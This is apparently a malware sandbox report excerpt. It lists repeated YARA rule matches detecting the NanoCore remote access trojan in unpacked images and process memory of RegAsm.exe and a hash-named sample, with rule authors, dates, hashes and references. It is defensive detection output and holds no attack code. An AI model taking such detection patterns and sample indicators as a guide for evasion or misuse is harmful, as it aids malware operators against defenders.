      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.2ffb670.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.2dc5cb4.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegAsm.exe.5650000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
